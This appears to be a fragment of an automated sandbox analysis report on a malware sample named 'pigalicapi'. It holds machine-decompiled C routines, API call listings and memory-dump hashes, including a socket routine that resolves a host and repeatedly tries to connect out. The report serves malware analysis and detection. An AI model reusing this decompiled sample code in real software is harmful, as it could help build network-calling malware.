                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t167 < 0 || _t151 > 3) {
                                                                                                                                                                                                                                                                                                        						_t132 = E00405ED0(_t157 - 0x170);
                                                                                                                                                                                                                                                                                                        						_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t150 =  &(_t120[0xb]);
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x164) = _t150;
                                                                                                                                                                                                                                                                                                        						if(_t120[0xb] != 0x5f || _t120[0xc] != 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *_t161 = _t150;
                                                                                                                                                                                                                                                                                                        							_t125 = _t157 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t134 = E00404FF0(_t157 - 0x170, strlen(??), _t150);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *(_t157 - 0x164) =  &(_t120[0xd]);
                                                                                                                                                                                                                                                                                                        							_t125 = _t157 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t134 = E00406810(_t157 - 0x170, 0);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t161 = 0;
                                                                                                                                                                                                                                                                                                        						_t116 = E00404F90(_t125, _t134, (0 | _t151 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        						_t126 =  *(_t157 - 0x164);
                                                                                                                                                                                                                                                                                                        						 *_t161 = _t126;
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x184) = _t116;
                                                                                                                                                                                                                                                                                                        						_t117 = strlen(??);
                                                                                                                                                                                                                                                                                                        						_t132 =  *(_t157 - 0x184);
                                                                                                                                                                                                                                                                                                        						_t127 =  &(_t126[_t117]);
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x164) = _t127;
                                                                                                                                                                                                                                                                                                        						_t136 =  *_t127 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L15:
                                                                                                                                                                                                                                                                                                        				_t94 = 0;
                                                                                                                                                                                                                                                                                                        				if(_t136 == 0 && _t132 != 0) {
                                                                                                                                                                                                                                                                                                        					_t122 = _t157 - 0x13c;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x3c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t157 - 0x38)) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t157 - 0x34)) =  *((intOrPtr*)(_t157 - 0x17c));
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x28) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x20) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x30) =  *(_t157 - 0x180);
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x24) = 0;
                                                                                                                                                                                                                                                                                                        					E004079F0(_t122, _t132, 0x11);
                                                                                                                                                                                                                                                                                                        					_t99 =  *(_t157 - 0x3c);
                                                                                                                                                                                                                                                                                                        					 *_t161 = _t122;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t157 + _t99 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        					_t161[2] =  *(_t157 - 0x30);
                                                                                                                                                                                                                                                                                                        					_t161[1] = _t99;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t157 - 0x34))();
                                                                                                                                                                                                                                                                                                        					_t94 = 0 |  *(_t157 - 0x24) == 0x00000000;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t94;
                                                                                                                                                                                                                                                                                                        				goto L31;
                                                                                                                                                                                                                                                                                                        			}





























                                                                                                                                                                                                                                                                                                        0x0040c6fc
                                                                                                                                                                                                                                                                                                        0x0040c6fc
                                                                                                                                                                                                                                                                                                        0x0040c702
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c642
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c82c
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_$_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-4277869324
                                                                                                                                                                                                                                                                                                        • Opcode ID: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d7f502781d967d802a4aa3f964cc6313e810cf132c2305c106e04feedb735a0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13511875D04619CBDB20DF69C8843DEBBF0AF49304F0481AAD448BB381DB399A898F85
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E
                                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F47
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00411F74
                                                                                                                                                                                                                                                                                                        • _endthreadex.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F8B
                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,004122C1), ref: 00411FA6
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,004122C1), ref: 00411FB7
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411FE4
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00411FFE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleValue$_endthreadexlongjmp
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3990644698-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4e6f2f2bca7cf614c94cf5b6cd3d36f82834035e84155aea1445addecb616fae
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4313EB0204301DFD711AF65D98879A7FE4AF04348F45886EEA458F362D778D886CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                        			E024EA090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                                                        				signed char _v8;
                                                                                                                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                                                                                                                        				signed char _v13;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				short _v34;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                                                                                                                        				char* _t42;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_push(6);
                                                                                                                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                                                                                                                        				_push(2);
                                                                                                                                                                                                                                                                                                        				L024EB210();
                                                                                                                                                                                                                                                                                                        				_v20 = __eax;
                                                                                                                                                                                                                                                                                                        				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_v36 = 2;
                                                                                                                                                                                                                                                                                                        					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        					L024EB20A();
                                                                                                                                                                                                                                                                                                        					_v34 = 2;
                                                                                                                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                                                                                                                        					L024EB204();
                                                                                                                                                                                                                                                                                                        					_v12 = 2;
                                                                                                                                                                                                                                                                                                        					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                                        						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                                                                                                                        					_v13 = 0;
                                                                                                                                                                                                                                                                                                        					_v40 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                                                        						_push(0x10);
                                                                                                                                                                                                                                                                                                        						_t42 =  &_v36;
                                                                                                                                                                                                                                                                                                        						_push(_t42);
                                                                                                                                                                                                                                                                                                        						_push(_v20);
                                                                                                                                                                                                                                                                                                        						L024EB1FE();
                                                                                                                                                                                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                                                                                                                                                                                        							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v13 = 1;
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                                        							_v44 = _a16;
                                                                                                                                                                                                                                                                                                        							_push(4);
                                                                                                                                                                                                                                                                                                        							_push( &_v44);
                                                                                                                                                                                                                                                                                                        							_push(0x1005);
                                                                                                                                                                                                                                                                                                        							_push(0xffff);
                                                                                                                                                                                                                                                                                                        							_push(_v20);
                                                                                                                                                                                                                                                                                                        							L024EB1F2();
                                                                                                                                                                                                                                                                                                        							_push(4);
                                                                                                                                                                                                                                                                                                        							_push( &_v44);
                                                                                                                                                                                                                                                                                                        							_push(0x1006);
                                                                                                                                                                                                                                                                                                        							_push(0xffff);
                                                                                                                                                                                                                                                                                                        							_push(_v20);
                                                                                                                                                                                                                                                                                                        							L024EB1F2();
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return _v20;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t40 = _v20;
                                                                                                                                                                                                                                                                                                        					_push(_t40);
                                                                                                                                                                                                                                                                                                        					L024EB1F8();
                                                                                                                                                                                                                                                                                                        					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v20;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x024ea096
                                                                                                                                                                                                                                                                                                        0x024ea098
                                                                                                                                                                                                                                                                                                        0x024ea09a
                                                                                                                                                                                                                                                                                                        0x024ea09c
                                                                                                                                                                                                                                                                                                        0x024ea0a1
                                                                                                                                                                                                                                                                                                        0x024ea0a8
                                                                                                                                                                                                                                                                                                        0x024ea0b7
                                                                                                                                                                                                                                                                                                        0x024ea0bf
                                                                                                                                                                                                                                                                                                        0x024ea0c0
                                                                                                                                                                                                                                                                                                        0x024ea0c5
                                                                                                                                                                                                                                                                                                        0x024ea0cc
                                                                                                                                                                                                                                                                                                        0x024ea0cd
                                                                                                                                                                                                                                                                                                        0x024ea0d2
                                                                                                                                                                                                                                                                                                        0x024ea0d9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea0ea
                                                                                                                                                                                                                                                                                                        0x024ea0e5
                                                                                                                                                                                                                                                                                                        0x024ea0f2
                                                                                                                                                                                                                                                                                                        0x024ea0f9
                                                                                                                                                                                                                                                                                                        0x024ea0fd
                                                                                                                                                                                                                                                                                                        0x024ea10f
                                                                                                                                                                                                                                                                                                        0x024ea117
                                                                                                                                                                                                                                                                                                        0x024ea119
                                                                                                                                                                                                                                                                                                        0x024ea11c
                                                                                                                                                                                                                                                                                                        0x024ea120
                                                                                                                                                                                                                                                                                                        0x024ea121
                                                                                                                                                                                                                                                                                                        0x024ea128
                                                                                                                                                                                                                                                                                                        0x024ea10c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea10c
                                                                                                                                                                                                                                                                                                        0x024ea12a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea12a
                                                                                                                                                                                                                                                                                                        0x024ea138
                                                                                                                                                                                                                                                                                                        0x024ea14c
                                                                                                                                                                                                                                                                                                        0x024ea151
                                                                                                                                                                                                                                                                                                        0x024ea154
                                                                                                                                                                                                                                                                                                        0x024ea159
                                                                                                                                                                                                                                                                                                        0x024ea15a
                                                                                                                                                                                                                                                                                                        0x024ea15f
                                                                                                                                                                                                                                                                                                        0x024ea167
                                                                                                                                                                                                                                                                                                        0x024ea168
                                                                                                                                                                                                                                                                                                        0x024ea16d
                                                                                                                                                                                                                                                                                                        0x024ea172
                                                                                                                                                                                                                                                                                                        0x024ea173
                                                                                                                                                                                                                                                                                                        0x024ea178
                                                                                                                                                                                                                                                                                                        0x024ea180
                                                                                                                                                                                                                                                                                                        0x024ea181
                                                                                                                                                                                                                                                                                                        0x024ea181
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea186
                                                                                                                                                                                                                                                                                                        0x024ea13a
                                                                                                                                                                                                                                                                                                        0x024ea13d
                                                                                                                                                                                                                                                                                                        0x024ea13e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea143
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 024EA09C
                                                                                                                                                                                                                                                                                                        • htons.WS2_32(?), ref: 024EA0C0
                                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 024EA0CD
                                                                                                                                                                                                                                                                                                        • connect.WS2_32(000000FF,?,00000010), ref: 024EA121
                                                                                                                                                                                                                                                                                                        • closesocket.WS2_32(000000FF), ref: 024EA13E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 530611402-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                                        • Instruction ID: c4d5b2e8de506d42f557759eda520b5497d63c7b86a7e469591cf18028dcf8b4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87314F70A00229ABEF11DFA5C845BFEF776FF48315F10865AE5226B2C0D3B59980CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB
                                                                                                                                                                                                                                                                                                        • InterlockedExchangeAdd.KERNEL32 ref: 00415D2D
                                                                                                                                                                                                                                                                                                        • ReleaseSemaphore.KERNEL32 ref: 00415D50
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415D60
                                                                                                                                                                                                                                                                                                        • InterlockedExchangeAdd.KERNEL32 ref: 00415D82
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44), ref: 00415D8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$ExchangeInterlocked$EnterReleaseSemaphore
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3502810096-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
                                                                                                                                                                                                                                                                                                        • Instruction ID: c4e03dc48a609bb18e9f28535bc8b230369afd8b821da037918bb7a69205c831
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1215175A04608CFDB00EFB8E88929EBBF0EB88351F00853AE955C3350E734A559CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

